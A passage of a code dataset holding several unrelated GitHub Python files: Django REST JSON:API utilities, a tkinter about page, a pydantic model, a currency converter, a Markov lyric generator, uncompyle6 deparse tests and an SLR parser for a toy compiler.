get_related_resource_type(relation.child_relation)\n except AttributeError:\n # Some read only relationships fail to get it directly, fall through to\n # get via the parent\n pass\n if not relation_model:\n parent_serializer = relation.parent\n parent_model = None\n if isinstance(parent_serializer, PolymorphicModelSerializer):\n parent_model = parent_serializer.get_polymorphic_serializer_for_instance(\n parent_serializer.instance\n ).Meta.model\n elif hasattr(parent_serializer, \"Meta\"):\n parent_model = getattr(parent_serializer.Meta, \"model\", None)\n elif hasattr(parent_serializer, \"parent\") and hasattr(\n parent_serializer.parent, \"Meta\"\n ):\n parent_model = getattr(parent_serializer.parent.Meta, \"model\", None)\n\n if parent_model is not None:\n if relation.source:\n if relation.source != \"*\":\n parent_model_relation = getattr(parent_model, relation.source)\n else:\n parent_model_relation = getattr(parent_model, relation.field_name)\n else:\n parent_model_relation = getattr(\n parent_model, parent_serializer.field_name\n )\n\n parent_model_relation_type = type(parent_model_relation)\n if parent_model_relation_type is ReverseManyToOneDescriptor:\n relation_model = parent_model_relation.rel.related_model\n elif parent_model_relation_type is ManyToManyDescriptor:\n relation_model = parent_model_relation.field.remote_field.model\n # In case we are in a reverse relation\n if 
relation_model == parent_model:\n relation_model = parent_model_relation.field.model\n elif parent_model_relation_type is ReverseGenericManyToOneDescriptor:\n relation_model = parent_model_relation.rel.model\n elif hasattr(parent_model_relation, \"field\"):\n try:\n relation_model = parent_model_relation.field.remote_field.model\n except AttributeError:\n relation_model = parent_model_relation.field.related.model\n else:\n return get_related_resource_type(parent_model_relation)\n\n if relation_model is None:\n # For ManyRelatedFields on plain Serializers the resource_type\n # cannot be determined from a model, so we must get it from the\n # child_relation\n if hasattr(relation, \"child_relation\"):\n return get_related_resource_type(relation.child_relation)\n raise APIException(\n _(f\"Could not resolve resource type for relation {relation}\")\n )\n\n return get_resource_type_from_model(relation_model)\n\n\ndef get_resource_type_from_model(model):\n json_api_meta = getattr(model, \"JSONAPIMeta\", None)\n return getattr(json_api_meta, \"resource_name\", format_resource_type(model.__name__))\n\n\ndef get_resource_type_from_queryset(qs):\n return get_resource_type_from_model(qs.model)\n\n\ndef get_resource_type_from_instance(instance):\n if hasattr(instance, \"_meta\"):\n return get_resource_type_from_model(instance._meta.model)\n\n\ndef get_resource_type_from_manager(manager):\n return get_resource_type_from_model(manager.model)\n\n\ndef get_resource_type_from_serializer(serializer):\n json_api_meta = getattr(serializer, \"JSONAPIMeta\", None)\n meta = getattr(serializer, \"Meta\", None)\n if hasattr(json_api_meta, \"resource_name\"):\n return json_api_meta.resource_name\n elif hasattr(meta, \"resource_name\"):\n return meta.resource_name\n elif hasattr(meta, \"model\"):\n return get_resource_type_from_model(meta.model)\n raise AttributeError(\n f\"can not detect 'resource_name' on serializer {serializer.__class__.__name__!r}\"\n f\" in module {serializer.__class__.__module__!r}\"\n )\n\n\ndef get_resource_id(resource_instance, resource):\n \"\"\"Returns the resource identifier for a given instance (`id` takes priority over `pk`).\"\"\"\n if resource and \"id\" in resource:\n return resource[\"id\"] and encoding.force_str(resource[\"id\"]) or None\n if resource_instance:\n return (\n hasattr(resource_instance, \"pk\")\n and encoding.force_str(resource_instance.pk)\n or None\n )\n return None\n\n\ndef get_included_resources(request, serializer=None):\n \"\"\"Build a list of included resources.\"\"\"\n include_resources_param = request.query_params.get(\"include\") if request else None\n if include_resources_param:\n return include_resources_param.split(\",\")\n else:\n return get_default_included_resources_from_serializer(serializer)\n\n\ndef get_default_included_resources_from_serializer(serializer):\n meta = getattr(serializer, \"JSONAPIMeta\", None)\n if meta is None and getattr(serializer, \"many\", False):\n meta = getattr(serializer.child, \"JSONAPIMeta\", None)\n return list(getattr(meta, \"included_resources\", []))\n\n\ndef get_relation_instance(resource_instance, source, serializer):\n try:\n relation_instance = operator.attrgetter(source)(resource_instance)\n except AttributeError:\n # if the field is not defined on the model then we check the serializer\n # and if no value is there we skip over the field completely\n serializer_method = getattr(serializer, source, None)\n if serializer_method and callable(serializer_method):\n relation_instance = 
serializer_method(resource_instance)\n else:\n return False, None\n\n if isinstance(relation_instance, Manager):\n relation_instance = relation_instance.all()\n\n return True, relation_instance\n\n\ndef is_relationship_field(field):\n return isinstance(field, (relations.RelatedField, relations.ManyRelatedField))\n\n\nclass Hyperlink(str):\n \"\"\"\n A string like object that additionally has an associated name.\n We use this for hyperlinked URLs that may render as a named link\n in some contexts, or render as a plain URL in others.\n\n Comes from Django REST framework 3.2\n https://github.com/tomchristie/django-rest-framework\n \"\"\"\n\n def __new__(cls, url, name):\n ret = str.__new__(cls, url)\n ret.name = name\n return ret\n\n is_hyperlink = True\n\n\ndef format_drf_errors(response, context, exc):\n errors = []\n # handle generic errors. ValidationError('test') in a view for example\n if isinstance(response.data, list):\n for message in response.data:\n errors.extend(format_error_object(message, \"/data\", response))\n # handle all errors thrown from serializers\n else:\n # Avoid circular deps\n from rest_framework import generics\n\n has_serializer = isinstance(context[\"view\"], generics.GenericAPIView)\n if has_serializer:\n serializer = context[\"view\"].get_serializer()\n fields = get_serializer_fields(serializer) or dict()\n relationship_fields = [\n format_field_name(name)\n for name, field in fields.items()\n if is_relationship_field(field)\n ]\n\n for field, error in response.data.items():\n non_field_error = field == api_settings.NON_FIELD_ERRORS_KEY\n field = format_field_name(field)\n pointer = None\n if non_field_error:\n # Serializer error does not refer to a specific field.\n pointer = \"/data\"\n elif has_serializer:\n # pointer can be determined only if there's a serializer.\n rel = \"relationships\" if field in relationship_fields else \"attributes\"\n pointer = f\"/data/{rel}/{field}\"\n if isinstance(exc, Http404) and isinstance(error, str):\n # 404 errors don't have a pointer\n errors.extend(format_error_object(error, None, response))\n elif isinstance(error, str):\n classes = inspect.getmembers(exceptions, inspect.isclass)\n # DRF sets the `field` to 'detail' for its own exceptions\n if isinstance(exc, tuple(x[1] for x in classes)):\n pointer = \"/data\"\n errors.extend(format_error_object(error, pointer, response))\n elif isinstance(error, list):\n errors.extend(format_error_object(error, pointer, response))\n else:\n errors.extend(format_error_object(error, pointer, response))\n\n context[\"view\"].resource_name = \"errors\"\n response.data = errors\n\n return response\n\n\ndef format_error_object(message, pointer, response):\n errors = []\n if isinstance(message, dict):\n # as there is no required field in error object we check that all fields are string\n # except links, source or meta which might be a dict\n is_custom_error = all(\n [\n isinstance(value, str)\n for key, value in message.items()\n if key not in [\"links\", \"source\", \"meta\"]\n ]\n )\n\n if is_custom_error:\n if \"source\" not in message:\n message[\"source\"] = {}\n if \"pointer\" not in message[\"source\"]:\n message[\"source\"][\"pointer\"] = pointer\n errors.append(message)\n else:\n for k, v in message.items():\n errors.extend(format_error_object(v, pointer + f\"/{k}\", response))\n elif isinstance(message, list):\n for num, error in enumerate(message):\n if isinstance(error, (list, dict)):\n new_pointer = pointer + f\"/{num}\"\n else:\n new_pointer = pointer\n if error:\n 
errors.extend(format_error_object(error, new_pointer, response))\n else:\n error_obj = {\n \"detail\": message,\n \"status\": encoding.force_str(response.status_code),\n }\n if pointer is not None:\n error_obj[\"source\"] = {\n \"pointer\": pointer,\n }\n code = getattr(message, \"code\", None)\n if code is not None:\n error_obj[\"code\"] = code\n errors.append(error_obj)\n\n return errors\n\n\ndef format_errors(data):\n if len(data) > 1 and isinstance(data, list):\n data.sort(key=lambda x: x.get(\"source\", {}).get(\"pointer\", \"\"))\n return {\"errors\": data}\n","repo_name":"django-json-api/django-rest-framework-json-api","sub_path":"rest_framework_json_api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":17436,"program_lang":"python","lang":"en","doc_type":"code","stars":1116,"dataset":"github-code","pt":"37"} +{"seq_id":"13206402557","text":"import tkinter as tk\r\n\r\n\r\nclass AboutUsPage(tk.Frame):\r\n def __init__(self, parent, controller):\r\n tk.Frame.__init__(self, parent)\r\n self.controller = controller\r\n l1 = tk.Label(self, text=\"About Vibr.IO\", font=(None, 28), pady=20)\r\n l1.pack()\r\n\r\n l2 = tk.Label(self,\r\n text=\"Vibr.IO is developed by Charosa Research Incubator, a student group at the University of Minnesota - Twin Cities.\",\r\n font=(None, 14), pady=10)\r\n l2.pack()\r\n\r\n t1 = tk.Label(self, text=\"Contributors\", font=(None, 20), pady=0)\r\n t1.pack()\r\n\r\n l3 = tk.Label(self, text=\"David Wang\\n Alessandro Snyder\\n Gaurav Behera\", font=(None, 14), pady=10)\r\n l3.pack()\r\n\r\n t2 = tk.Label(self, text=\"Model Approximations\", font=(None, 20), pady=0)\r\n t2.pack()\r\n\r\n l4 = tk.Label(self,\r\n text=\"The model represents cell growth in culture as a batch process described by Monod growth kinetics. For the model, NaCl was considered the limiting substrate for cell growth. The growth constants umax, Ks, and Yxs were fit from experimental data of Vibrio fischeri growth in medium containing yeast extract, tryptone, and NaCl (Castillo-Gomez et al. 2019). The fit values were: umax = 0.43 hr\\u207b\\u00b9, Ks = 1.2 g/L, Yxs = 1.21. Peak cell density was approximated as the point where the cell population grew by less than 0.01% versus the previous timestep.\\n Cell death was approximated by first-order kinetics, with a death constant of Kd = 0.43 hr\\u207b\\u00b9. This value from the literature describes the death rate of E. coli in culture, and was used as a first approximation to estimate the death rate of V. fischeri (Schink et al. 2019).\",\r\n font=(None, 14), wraplength=1000, pady=10)\r\n l4.pack()\r\n\r\n t3 = tk.Label(self, text=\"Acknowledgements\", font=(None, 20), pady=0)\r\n t3.pack()\r\n\r\n l5 = tk.Label(self, text=\"Thank you to Y. 
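For orientation (an illustrative trace, not quoted from the library's docs): given a serializer error on a name attribute and a 400 response, the helpers above emit JSON:API error objects shaped like this.

# format_error_object("This field is required.", "/data/attributes/name", response)
# with response.status_code == 400 returns:
[{
    "detail": "This field is required.",
    "status": "400",
    "source": {"pointer": "/data/attributes/name"},
}]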
Luna Lin, for the Vibrio fischeri modeling advice.\", font=(None, 14),\r\n pady=10)\r\n l5.pack()\r\n\r\n btn1 = tk.Button(self, text='Back', command=lambda: controller.show_frame(\"StartPage\"))\r\n btn1.config(height=3, width=20)\r\n btn1.pack(pady=30)","repo_name":"charosa-umn/Vibr.IO","sub_path":"about_us_page.py","file_name":"about_us_page.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"72162084266","text":"from typing import List, Optional\n\nimport uuid\n\nfrom pydantic import BaseModel, Field\n\nmake_uuid = lambda: str(uuid.uuid4())\n\n\nclass PersonModel(BaseModel):\n id: str = Field(default_factory=make_uuid)\n imie: str\n nazwisko: str\n wiek: int\n o_mnie: str\n ulubiona_postac_z_kapitana_bomby: str\n ulubiony_serial: str\n ulubiony_film: str\n ulubiony_kolor: str\n vector: Optional[List[float]] = None\n","repo_name":"Pankejk/ai-devs-2","sub_path":"ai_devs_2/tasks/tasks_3/tasks_5_2/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"8876102359","text":"import requests\nimport json\n\nwhile True:\n adres = \"https://api.exchangeratesapi.io/latest?base=\"\n\n\n print(\"dollar = USD \\nTurkish lira = TRY\\neuro = EUR\\nRussian ruble = RUB\\nenter one of these codes..\")\n\n\n bozulanDovız = input(\"please enter the currency you want to exchange : \")\n bozulanKur = input(\"please enter the currency to convert into : \")\n mıktar = int(input(f\"How much { bozulanDovız } do you want to exchange : \"))\n\n\n\n result = requests.get(adres + bozulanDovız)\n result = json.loads(result.text)\n\n print(\"1 {0} = {1} {2}\".format(bozulanDovız, result[\"rates\"][bozulanKur], bozulanKur))\n print(\"{0} {1} = {2} {3}\".format(mıktar, bozulanDovız, mıktar * result[\"rates\"][bozulanKur], bozulanKur))","repo_name":"hayrullahgozel/Python","sub_path":"api ile dovız cevirme.py","file_name":"api ile dovız cevirme.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"70019486828","text":"\"\"\"\nEmpty Compose Template to implement :D\n\nYouTube Kylie Ying: https://www.youtube.com/ycubed \nTwitch KylieYing: https://www.twitch.tv/kylieying \nTwitter @kylieyying: https://twitter.com/kylieyying \nInstagram @kylieyying: https://www.instagram.com/kylieyying/ \nWebsite: https://www.kylieying.com\nGithub: https://www.github.com/kying18 \nProgrammer Beast Mode Spotify playlist: https://open.spotify.com/playlist/4Akns5EUb3gzmlXIdsJkPs?si=qGc4ubKRRYmPHAJAIrCxVQ \n\"\"\"\n\n# What do we need to do here?\nimport os\nimport re\nimport string\nimport random\n\nfrom graph_template import Graph, Vertex\n\n\ndef get_words_from_text(text_path):\n with open(text_path, 'r') as f:\n text = f.read()\n \n # remove [text in here]\n text = re.sub(r'\\[(.+)\\]', ' ', text)\n\n text = ' '.join(text.split())\n text = text.lower() # make everything lowercase\n '''\n Now we could be complex and deal with punctuation; but there are cases where \n you might add a period such as (Mr. Brightside), but that's not really \n punctuation, so we just remove all the punctuation\n '''\n # hello! it's me. 
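The currency converter above assumes every request succeeds and both codes exist in the response; a guarded variant (illustrative, same endpoint assumed, meant for the inside of the while loop so continue is valid):

resp = requests.get(adres + bozulanDovız, timeout=10)
resp.raise_for_status()  # fail loudly on HTTP errors
rates = resp.json().get("rates", {})
if bozulanKur not in rates:
    print(f"Unknown currency code: {bozulanKur}")
    continue  # back to the top of the surrounding while loop
rate = rates[bozulanKur]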
-> hello its me\n text = text.translate(str.maketrans('', '', string.punctuation))\n\n words = text.split() # split on spaces again\n return words\n\n\ndef make_graph(words):\n g = Graph()\n\n previous_word = None\n\n # for each word\n for word in words:\n # check that word is in the graph, and if not then add it\n word_vertex = g.get_vertex(word)\n # if there was a previous word, then add an edge if it does not already\n if previous_word:\n previous_word.increment_edge(word_vertex)\n # set our word to the previous word and iterate\n previous_word = word_vertex\n\n # now remember that we want to generate the probability mappings before composing\n # this is a great place to do it before we return the graph object\n g.generate_probability_mappings()\n\n return g\n\n\ndef compose(g, words, length=50):\n composition = []\n word = g.get_vertex(random.choice(words)) # pick a random word\n for _ in range(length):\n composition.append(word.value)\n word = g.get_next_word(word)\n\n return composition\n\n\ndef main(artist):\n # Step 1: get words from text\n # words = get_words_from_text('texts/hp_sorcerer_stone.txt')\n words = []\n for song_file in os.listdir(f'songs/{artist}'):\n if song_file == '.DS_Store':\n continue\n song_words = get_words_from_text(f'songs/{artist}/{song_file}')\n words.extend(song_words)\n # Step 2: make a graph using those words\n g = make_graph(words)\n # Step 3: get the next word for x number of words (defined by user)\n # Step 4: show the user\n composition = compose(g, words, 100)\n return ' '.join(composition)\n\n\nif __name__ == '__main__':\n print(main('taylor_swift'))\n","repo_name":"aaronsaldanha/12-Beginner-Python-Projects","sub_path":"Graph Composer/compose_template.py","file_name":"compose_template.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11109749236","text":"from uncompyle6.semantics.fragments import code_deparse as deparse\nfrom xdis.version_info import PYTHON_VERSION_TRIPLE\n\ndef map_stmts(x, y):\n x = []\n y = {}\n return x, y\n\ndef return_stmt(x, y):\n return x, y\n\ndef try_stmt():\n try:\n x = 1\n except:\n pass\n return x\n\ndef for_range_stmt():\n for i in range(2):\n i+1\n\n# # FIXME: add this test - but for Python 2.7+ only\n# def set_comp():\n# {y for y in range(3)}\n\n# FIXME: add this test\ndef list_comp():\n [y for y in range(3)]\n\ndef get_parsed_for_fn(fn):\n code = fn.__code__\n return deparse(code, version=PYTHON_VERSION_TRIPLE)\n\ndef check_expect(expect, parsed, fn_name):\n debug = False\n i = 2\n max_expect = len(expect)\n for name, offset in sorted(parsed.offsets.keys()):\n assert i+1 <= max_expect, (\n \"%s: ran out if items in testing node\" % fn_name)\n nodeInfo = parsed.offsets[name, offset]\n node = nodeInfo.node\n extractInfo = parsed.extract_node_info(node)\n\n assert expect[i] == extractInfo.selectedLine, \\\n ('%s: line %s expect:\\n%s\\ngot:\\n%s' %\n (fn_name, i, expect[i], extractInfo.selectedLine))\n assert expect[i+1] == extractInfo.markerLine, \\\n ('line %s expect:\\n%s\\ngot:\\n%s' %\n (i+1, expect[i+1], extractInfo.markerLine))\n i += 3\n if debug:\n print(node.offset)\n print(extractInfo.selectedLine)\n print(extractInfo.markerLine)\n\n extractInfo, p = parsed.extract_parent_info(node)\n if extractInfo:\n assert i+1 < max_expect, \"ran out of items in testing parent\"\n if debug:\n print(\"Contained in...\")\n print(extractInfo.selectedLine)\n print(extractInfo.markerLine)\n assert expect[i] == 
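graph_template.py is imported above but not shown; a minimal Vertex sketch consistent with the calls in the composer (increment_edge, a probability mapping built once, then weighted next-word choice). The attribute names here are assumptions, not the original implementation:

import random

class Vertex:
    def __init__(self, value):
        self.value = value
        self.adjacent = {}  # neighbor Vertex -> edge count
        self.neighbors = []
        self.neighbors_weights = []

    def increment_edge(self, vertex):
        self.adjacent[vertex] = self.adjacent.get(vertex, 0) + 1

    def get_probability_map(self):
        # snapshot counts so random.choices can weight by edge frequency;
        # Graph.generate_probability_mappings would call this on every vertex
        self.neighbors = list(self.adjacent)
        self.neighbors_weights = [self.adjacent[v] for v in self.neighbors]

    def next_word(self):
        return random.choices(self.neighbors, weights=self.neighbors_weights)[0]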
extractInfo.selectedLine, \\\n (\"parent line %s expect:\\n%s\\ngot:\\n%s\" %\n (i, expect[i], extractInfo.selectedLine))\n assert expect[i+1] == extractInfo.markerLine, \\\n (\"parent line %s expect:\\n%s\\ngot:\\n%s\" %\n (i+1, expect[i+1], extractInfo.markerLine))\n i += 3\n pass\n pass\n\n\ndef test_stuff():\n return\n parsed = get_parsed_for_fn(map_stmts)\n expect = \"\"\"\n-1\nreturn (x, y)\n ^\nContained in...\nreturn (x, y)\n-------------\n0\nx = []\n -\nContained in...\nx = []\n --\n3\nx = []\n-\nContained in...\nx = []\n------\n6\ny = {}\n -\nContained in...\ny = {}\n --\n9\ny = {}\n-\nContained in...\ny = {}\n------\n12\nreturn (x, y)\n -\nContained in...\nreturn (x, y)\n ------\n15\nreturn (x, y)\n -\nContained in...\nreturn (x, y)\n ------\n18\nreturn (x, y)\n ------\nContained in...\nreturn (x, y)\n-------------\n21\nreturn (x, y)\n-------------\nContained in...\nx = [] ...\n------ ...\n\"\"\".split(\"\\n\")\n check_expect(expect, parsed, 'map_stmts')\n ########################################################\n # return\n\n parsed = get_parsed_for_fn(return_stmt)\n expect = \"\"\"\n-1\nreturn (x, y)\n ^\nContained in...\nreturn (x, y)\n-------------\n0\nreturn (x, y)\n -\nContained in...\nreturn (x, y)\n ------\n3\nreturn (x, y)\n -\nContained in...\nreturn (x, y)\n ------\n6\nreturn (x, y)\n ------\nContained in...\nreturn (x, y)\n-------------\n9\nreturn (x, y)\n-------------\nContained in...\nreturn (x, y)\n-------------\n\"\"\".split(\"\\n\")\n check_expect(expect, parsed, 'return_stmt')\n ########################################################\n# # try\n\n# expect = \"\"\"\n# -1\n# return (x, y)\n# ^\n# Contained in...\n# return (x, y)\n# -------------\n# 0\n# try:\n# ----\n# Contained in...\n# try: ...\n# ---- ...\n# 3\n# x = 1\n# -\n# Contained in...\n# x = 1\n# -----\n# 6\n# x = 1\n# -\n# Contained in...\n# x = 1\n# -----\n# 9\n# pass\n# ^\n# Contained in...\n# try: ...\n# ---- ...\n# 10\n# except:\n# ^\n# Contained in...\n# except: ...\n# ------- ...\n# 19\n# pass\n# ^\n# Contained in...\n# except: ...\n# ------- ...\n# 13_0\n# except:\n# ^\n# Contained in...\n# except: ...\n# ------- ...\n# 20_0\n# pass\n# ^\n# Contained in...\n# except: ...\n# ------- ...\n# \"\"\".split(\"\\n\")\n# parsed = get_parsed_for_fn(try_stmt)\n# check_expect(expect, parsed)\n\n# ########################################################\n# # for range\n expect = \"\"\"\n0\nfor i in range(2):\n -\nContained in...\nfor i in range(2): ...\n------------------ ...\n3\nfor i in range(2):\n -----\nContained in...\nfor i in range(2):\n --------\n6\nfor i in range(2):\n -\nContained in...\nfor i in range(2):\n --------\n9\nfor i in range(2):\n --------\nContained in...\nfor i in range(2): ...\n------------------ ...\n12\nfor i in range(2):\n -\nContained in...\nfor i in range(2): ...\n------------------ ...\n13\nfor i in range(2):\n -\nContained in...\nfor i in range(2): ...\n------------------ ...\n16\nfor i in range(2):\n -\nContained in...\nfor i in range(2): ...\n------------------ ...\n19\n i + 1\n -\nContained in...\n i + 1\n -----\n22\n i + 1\n -\nContained in...\n i + 1\n -----\n25\n i + 1\n -\nContained in...\n i + 1\n -----\n27\nreturn\n ^\nContained in...\n i + 1\n -----\n31\nreturn\n------\nContained in...\nfor i in range(2): ...\n------------------ ...\n34\nreturn\n------\nContained in...\nfor i in range(2): ...\n------------------ ...\n.\n\"\"\".split(\"\\n\")\n parsed = 
get_parsed_for_fn(for_range_stmt)\n","repo_name":"rocky/python-uncompyle6","sub_path":"pytest/test_deparse.py","file_name":"test_deparse.py","file_ext":"py","file_size_in_byte":5498,"program_lang":"python","lang":"en","doc_type":"code","stars":3383,"dataset":"github-code","pt":"37"} +{"seq_id":"25595950846","text":"from scanner import *\nfrom objeto import *\nimport pandas as pd\n\nPRINT_PILHA = False\nGET_ON_TABLE = False\nREDUCTION_GRAM = True\nREDUCE = False\nSHIFT = False\nTOKEN = False\nFULL_PILHA = False\nLEXEMA = False\ngram = [\n [\"P'\", \"P\"], #1\n [\"P\",\"inicio\",\"V\",\"A\"], #2\n [\"V\",\"varinicio\",\"LV\"], #3\n [\"LV\",\"D\",\"LV\"], #4\n [\"LV\",\"varfim\",\"PT_V\"], #5\n [\"D\",\"TIPO\",\"L\",\"PT_V\"], #6\n [\"L\",\"ID\",\"VIR\",\"L\"], #7\n [\"L\",\"ID\"], #8\n [\"TIPO\",\"inteiro\"], #9\n [\"TIPO\",\"real\"], #10\n [\"TIPO\",\"literal\"], #11\n [\"A\",\"ES\",\"A\"], #12\n [\"ES\",\"leia\",\"ID\",\"PT_V\"], #13\n [\"ES\",\"escreva\",\"ARG\",\"PT_V\"],#14\n [\"ARG\",\"LIT\"], #15\n [\"ARG\",\"NUM\"], #16\n [\"ARG\",\"ID\"], #17\n [\"A\",\"CMD\",\"A\"], #18\n [\"CMD\",\"ID\",\"ATR\",\"LD\",\"PT_V\"],#19\n [\"LD\",\"OPRD\",\"OPA\",\"OPRD\"],#20\n [\"LD\",\"OPRD\"], #21\n [\"OPRD\",\"ID\"], #22\n [\"OPRD\",\"NUM\"], #23\n [\"A\",\"COND\",\"A\"], #24\n [\"COND\",\"CAB\",\"CP\"], #25\n [\"CAB\",\"se\",\"AB_P\", \"EXP_R\",\"FC_P\",\"entao\"],#26\n [\"EXP_R\",\"OPRD\",\"OPR\",\"OPRD\"],#27\n [\"CP\",\"ES\",\"CP\"], #28\n [\"CP\",\"CMD\",\"CP\"], #29\n [\"CP\",\"COND\",\"CP\"], #30\n [\"CP\",\"fimse\"], #31\n [\"A\",\"fim\"] #32\n]\npilha = [0]\n\ndef main():\n\n iniciaObj()\n global pilha, gram\n Tabela = pd.read_csv(\"Tabela1.csv\")\n file = open('code.txt', 'r')\n #scan(file)\n\n token = getToken(file)\n if(TOKEN):\n print(f\"TOKEN {token}\")\n #print(Tabela[[\"inteiro\"]])\n\n #print(Tabela)\n while(True):\n \n if((token[\"classe\"]==\"EOF\" and pilha[-1] == \"0\")):\n break\n\n\n while(token == None):#comentario\n token = getToken(file)\n if(TOKEN):\n print(f\"TOKEN {token}\")\n\n UltimoPilha = pilha.pop()\n \n #print(Tabela.loc[2,\"varinicio\"])\n if(GET_ON_TABLE):\n print(f\"GET TABELA1 [{UltimoPilha}] , [{token['classe']}] = {Tabela.loc[int(UltimoPilha),token['classe']]} \")\n \n Action = Tabela.loc[int(UltimoPilha),token['classe']]\n while pd.isnull(Tabela.loc[int(UltimoPilha),token['classe']]):\n \n print(f\"[ERRO_PARSER]\\t{getLinhaColuna()} -> SRL TABLE[{UltimoPilha}][{token['classe']}] = {Action}, A sintaxe não valida, ferifique o Token: {token}\" )\n token = getToken(file)\n if(GET_ON_TABLE):\n print(f\"GET TABELA1 [{UltimoPilha}] , [{token['classe']}] = {Tabela.loc[int(UltimoPilha),token['classe']]} \")\n Action = Tabela.loc[int(UltimoPilha),token['classe']]\n\n if Action == \"acc\":\n break\n #print(Action)\n \n \n Action = Action.split(\".\")\n #print (f\"Action {Action}\")\n #print(Action)\n \n while(Action[0] == 'R'):\n if(REDUCE):\n print(f\"-->\\t\\tReduce {Action[1]}\")\n\n Gram = gram[int(Action[1])]\n \n if(REDUCTION_GRAM):\n print(f\">>>>>>>>>>>>>>>>> Gram[{int(Action[1])+1}] - {Gram[0]} ->\",end=' ')\n for i in (range(1,len(Gram))):\n print(f\"{Gram[i]}\",end=' ')\n print()\n \n \n lexemaList = []\n lexemaListTemp = []\n for i in reversed(range(1,len(Gram))):\n UltimoPilha = pilha.pop() # token\n lexemaListTemp.append(UltimoPilha['lexema'])\n\n if((UltimoPilha['classe'] != Gram[i]) == True): \n print(UltimoPilha['classe'] != Gram[i])\n print(f\"{UltimoPilha['classe']}!={Gram[i]}.\")\n if(UltimoPilha['classe'] != Gram[i]):#!!!!!!!\n 
print(\"[ERRO]\\tTabela e gramatica não bate.\")\n UltimoPilha = pilha.pop() # num\n lexema = ''\n \n for i in reversed(range(1,len(Gram))):\n lexemaList.append(lexemaListTemp.pop())\n\n #tempList = lexemaList.copy()\n tempList = []\n #tempList = [item for sublist in lexemaList for item in sublist]\n for A in lexemaList:\n if (type(A) == list):\n for item in A:\n tempList.append(item)\n else: \n tempList.append(A)\n\n #print(f\"templist{tempList}\")\n\n if(LEXEMA):\n print(tempList)\n print()\n#################### OBJ\n makeObj(int(Action[1])+1,tempList)\n #print(tempList)\n\n \n\n pilha.append(UltimoPilha)\n NewToken = {\"classe\" : Gram[0], \"lexema\": tempList, \"tipo\":'?'} \n pilha.append(NewToken)\n if(GET_ON_TABLE):\n print(f\"GET TABELA2 [{int(UltimoPilha)}] , [{Gram[0]} ] = {Tabela.loc[int(UltimoPilha),Gram[0]]}\")\n \n pilha.append(Tabela.loc[int(UltimoPilha),Gram[0]])\n \n if(PRINT_PILHA):\n print(pilha)\n\n UltimoPilha = pilha.pop()\n Action = Tabela.loc[int(UltimoPilha),token['classe']]\n\n while pd.isnull(Tabela.loc[int(UltimoPilha),token['classe']]):\n print(f\"[ERRO_PARSER]\\t{getLinhaColuna()} -> SRL TABLE[{UltimoPilha}][{token['classe']}] = {Action}, A sintaxe não valida, verifique o Token: {token}\" )\n token = getToken(file)\n if(GET_ON_TABLE):\n print(f\"GET TABELA1 [{UltimoPilha}] , [{token['classe']}] = {Tabela.loc[int(UltimoPilha),token['classe']]} \")\n Action = Tabela.loc[int(UltimoPilha),token['classe']]\n\n if Action == \"acc\":\n\n break\n if(GET_ON_TABLE):\n print(f\"GET TABELA3 [{UltimoPilha}] , [{token['classe'] }] = {Action}\")\n Action = Action.split(\".\")\n if(GET_ON_TABLE):\n print(f\"ACTION{Action}\")\n \n \n if(Action[0] == 'S'):\n if(SHIFT):\n print(f\"-->\\t\\tShift {Action[1]}\")\n #print(f\"UltimoPilha = {UltimoPilha}\")\n pilha.append(UltimoPilha)\n pilha.append(token)\n pilha.append(Action[1])\n\n if Action == \"acc\":\n break\n if(Action[0] != 'S' and Action[0] != 'R'):\n print(f\"[ERRO_PARSER]\\t{getLinhaColuna()}\\t{Action} nao valida\" )\n pilha.append(UltimoPilha)\n\n token = getToken(file)\n if(TOKEN):\n print(f\"TOKEN {token}\")\n if(FULL_PILHA):\n print()\n print(*pilha, sep='\\n')\n print()\n \nif __name__ == \"__main__\":\n main()\n listVar()\n #returnTabeladesimbulo()\n #print(pilha)\n\n\n\n","repo_name":"VVSRevolution/Compiladores","sub_path":"Compilador/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":6824,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11455702228","text":"#!/usr/bin/env python3\r\n\r\nimport requests\r\nimport codecs\r\nimport re\r\n\r\n# Don't include the gender icons from FontAwesome\r\nicon_blacklist = [\r\n \"genderless\", \"transgender.*\", \"neuter\", \"mars.*\", \"venus.*\", \"mercury.*\",\r\n \"intersex\"\r\n]\r\n\r\njs_template_header = \"\"\"\r\n.pragma library\r\n\r\nvar map = {\r\n\"\"\"\r\n\r\njs_template_footer = \"\"\"\r\n};\r\n\"\"\"\r\n\r\nfontFilename = ''\r\n\r\n\r\ndef is_blacklisted(icon_name):\r\n for blacklisted_icon in icon_blacklist:\r\n if re.match(blacklisted_icon, icon_name):\r\n return True\r\n\r\n return False\r\n\r\n\r\ndef get_awesome_icons():\r\n print('Downloading SCSS file...')\r\n\r\n response = requests.get('http://raw.githubusercontent.com/FortAwesome/' +\r\n 'Font-Awesome/master/scss/_variables.scss')\r\n icons = []\r\n\r\n for line in response.text.split('\\n'):\r\n if not line.startswith('$fa-var-'):\r\n continue\r\n\r\n line_array = line[8:].strip().split(': ')\r\n\r\n name = 
